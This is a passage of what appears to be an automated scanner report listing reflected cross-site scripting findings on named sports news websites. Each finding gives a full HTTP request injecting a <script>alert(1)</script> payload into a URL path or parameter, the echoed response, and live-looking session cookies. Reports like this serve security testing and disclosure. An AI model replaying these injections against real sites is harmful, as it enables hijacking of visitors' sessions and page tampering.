Date: Sun, 19 Dec 2010 18:32:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51798

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowlac109"><script>alert(1)</script>146cc501890/landing.html">
...[SNIP]...

2.304. http://www.csncalifornia.com/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d514c"><script>alert(1)</script>7a3c3d8fef0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html?d514c"><script>alert(1)</script>7a3c3d8fef0=1 HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51651

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="d514c"><script>alert(1)</script>7a3c3d8fef0" id = "d514c">
...[SNIP]...

2.305. http://www.csncalifornia.com/pages/profiles [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /pages/profiles

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f15e"><script>alert(1)</script>2593eca35fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/profiles?1f15e"><script>alert(1)</script>2593eca35fe=1 HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52903

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="1f15e"><script>alert(1)</script>2593eca35fe" id = "1f15e">
...[SNIP]...

2.306. http://www.csncalifornia.com/pages/video [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /pages/video

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6762"><script>alert(1)</script>c3145f829ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/video?c6762"><script>alert(1)</script>c3145f829ec=1 HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 76146

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="c6762"><script>alert(1)</script>c3145f829ec" id = "c6762">
...[SNIP]...

2.307. http://www.csnchicago.com/12/12/10/Blackhawks-Bowman-opens-up-to-CSNs-Boden/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnchicago.com
Path:   /12/12/10/Blackhawks-Bowman-opens-up-to-CSNs-Boden/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f4b1a<script>alert(1)</script>8c0a2cde489 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/12/10/Blackhawks-Bowman-opens-up-to-CSNs-Boden/landing.htmlf4b1a<script>alert(1)</script>8c0a2cde489 HTTP/1.1
Host: www.csnchicago.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:57 GMT
Content-Length: 816
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/12/10/Blackhawks-Bowman-opens-up-to-CSNs-Boden/landing.htmlf4b1a<script>alert(1)</script>8c0a2cde489"</strong>
...[SNIP]...

2.308. http://www.csnchicago.com/12/15/10/Noah-needs-surgery-could-miss-10-weeks/landing_bulls.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnchicago.com
Path:   /12/15/10/Noah-needs-surgery-could-miss-10-weeks/landing_bulls.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a6387<script>alert(1)</script>8d7c05fd3a3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/15/10/Noah-needs-surgery-could-miss-10-weeks/landing_bulls.htmla6387<script>alert(1)</script>8d7c05fd3a3 HTTP/1.1
Host: www.csnchicago.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:01 GMT
Content-Length: 820
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/15/10/Noah-needs-surgery-could-miss-10-weeks/landing_bulls.htmla6387<script>alert(1)</script>8d7c05fd3a3"</strong>
...[SNIP]...

2.309. http://www.csnchicago.com/12/16/10/Ginobilis-UFO-Sighting-Explained/landing_word_bball.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnchicago.com
Path:   /12/16/10/Ginobilis-UFO-Sighting-Explained/landing_word_bball.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b1513<script>alert(1)</script>632e19a2daf was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/16/10/Ginobilis-UFO-Sighting-Explained/landing_word_bball.htmlb1513<script>alert(1)</script>632e19a2daf HTTP/1.1
Host: www.csnchicago.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:09 GMT
Content-Length: 819
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/16/10/Ginobilis-UFO-Sighting-Explained/landing_word_bball.htmlb1513<script>alert(1)</script>632e19a2daf"</strong>
...[SNIP]...

2.310. http://www.csnchicago.com/12/16/10/bHawks-911bbrKane-Hossa-etc-Hawks-using-/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnchicago.com
Path:   /12/16/10/bHawks-911bbrKane-Hossa-etc-Hawks-using-/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 99ab8<script>alert(1)</script>9b0201d0528 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/16/10/bHawks-911bbrKane-Hossa-etc-Hawks-using-/landing.html99ab8<script>alert(1)</script>9b0201d0528 HTTP/1.1
Host: www.csnchicago.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:08 GMT
Content-Length: 816
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/16/10/bHawks-911bbrKane-Hossa-etc-Hawks-using-/landing.html99ab8<script>alert(1)</script>9b0201d0528"</strong>
...[SNIP]...

2.311. http://www.csnchicago.com/12/17/10/Bears-to-practice-at-Northwestern-to-pre/landing_insider_john_moon_mullin.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnchicago.com
Path:   /12/17/10/Bears-to-practice-at-Northwestern-to-pre/landing_insider_john_moon_mullin.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 712ca<script>alert(1)</script>a6471d6df31 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Bears-to-practice-at-Northwestern-to-pre/landing_insider_john_moon_mullin.html712ca<script>alert(1)</script>a6471d6df31 HTTP/1.1
Host: www.csnchicago.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:21 GMT
Content-Length: 841
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/17/10/Bears-to-practice-at-Northwestern-to-pre/landing_insider_john_moon_mullin.html712ca<script>alert(1)</script>a6471d6df31"</strong>
...[SNIP]...

2.312. http://www.csnchicago.com/12/17/10/Bears-to-practice-at-Nortwestern-to-prep/landing_insider_john_moon_mullin.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnchicago.com
Path:   /12/17/10/Bears-to-practice-at-Nortwestern-to-prep/landing_insider_john_moon_mullin.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 9a563<script>alert(1)</script>f1f018dae53 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Bears-to-practice-at-Nortwestern-to-prep/landing_insider_john_moon_mullin.html9a563<script>alert(1)</script>f1f018dae53 HTTP/1.1
Host: www.csnchicago.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:28 GMT
Content-Length: 841
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/17/10/Bears-to-practice-at-Nortwestern-to-prep/landing_insider_john_moon_mullin.html9a563<script>alert(1)</script>f1f018dae53"</strong>
...[SNIP]...

2.313. http://www.csnchicago.com/12/17/10/Greinke-Can-Block-Trade-to-15-Teams/landing_word_baseball.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnchicago.com
Path:   /12/17/10/Greinke-Can-Block-Trade-to-15-Teams/landing_word_baseball.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 20105<script>alert(1)</script>674560a4d25 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Greinke-Can-Block-Trade-to-15-Teams/landing_word_baseball.html20105<script>alert(1)</script>674560a4d25 HTTP/1.1
Host: www.csnchicago.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:13 GMT
Content-Length: 825
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/17/10/Greinke-Can-Block-Trade-to-15-Teams/landing_word_baseball.html20105<script>alert(1)</script>674560a4d25"</strong>
...[SNIP]...

2.314. http://www.csnchicago.com/12/17/10/Hawks-honor-Chris-Chelios-on-heritage-ni/landing_insider_tracey_myers.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnchicago.com
Path:   /12/17/10/Hawks-honor-Chris-Chelios-on-heritage-ni/landing_insider_tracey_myers.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 243ce<script>alert(1)</script>b64ca077b1d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Hawks-honor-Chris-Chelios-on-heritage-ni/landing_insider_tracey_myers.html243ce<script>alert(1)</script>b64ca077b1d HTTP/1.1
Host: www.csnchicago.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:12 GMT
Content-Length: 837
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/17/10/Hawks-honor-Chris-Chelios-on-heritage-ni/landing_insider_tracey_myers.html243ce<script>alert(1)</script>b64ca077b1d"</strong>
...[SNIP]...

2.315. http://www.csnchicago.com/12/19/10/RB-Ivory-inactive-for-Saints-vs-Ravens/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnchicago.com
Path:   /12/19/10/RB-Ivory-inactive-for-Saints-vs-Ravens/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 62f73<script>alert(1)</script>c101dced0fc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/10/RB-Ivory-inactive-for-Saints-vs-Ravens/landing.html62f73<script>alert(1)</script>c101dced0fc HTTP/1.1
Host: www.csnchicago.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:15 GMT
Content-Length: 814
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/19/10/RB-Ivory-inactive-for-Saints-vs-Ravens/landing.html62f73<script>alert(1)</script>c101dced0fc"</strong>
...[SNIP]...

2.316. http://www.csnchicago.com/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnchicago.com
Path:   /12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 25792<script>alert(1)</script>95de3cccb23 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html25792<script>alert(1)</script>95de3cccb23 HTTP/1.1
Host: www.csnchicago.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:13 GMT
Content-Length: 816
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html25792<script>alert(1)</script>95de3cccb23"</strong>
...[SNIP]...

2.317. http://www.csnchicago.com/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnchicago.com
Path:   /12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 53ce8<script>alert(1)</script>723e438eb6a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html53ce8<script>alert(1)</script>723e438eb6a HTTP/1.1
Host: www.csnchicago.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:15 GMT
Content-Length: 816
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html53ce8<script>alert(1)</script>723e438eb6a"</strong>
...[SNIP]...

2.318. http://www.csnchicago.com/common/global_flash/player/player.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnchicago.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 890f3<script>alert(1)</script>30c2dcc9195 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common890f3<script>alert(1)</script>30c2dcc9195/global_flash/player/player.php HTTP/1.1
Host: www.csnchicago.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:09 GMT
Content-Length: 791
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common890f3<script>alert(1)</script>30c2dcc9195/global_flash/player/player.php"</strong>
...[SNIP]...

2.319. http://www.csnchicago.com/common/global_flash/player/player.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnchicago.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4ffa0<script>alert(1)</script>ed79340cb56 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flash4ffa0<script>alert(1)</script>ed79340cb56/player/player.php HTTP/1.1
Host: www.csnchicago.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:09 GMT
Content-Length: 791
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flash4ffa0<script>alert(1)</script>ed79340cb56/player/player.php"</strong>
...[SNIP]...

2.320. http://www.csnchicago.com/common/global_flash/player/player.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnchicago.com
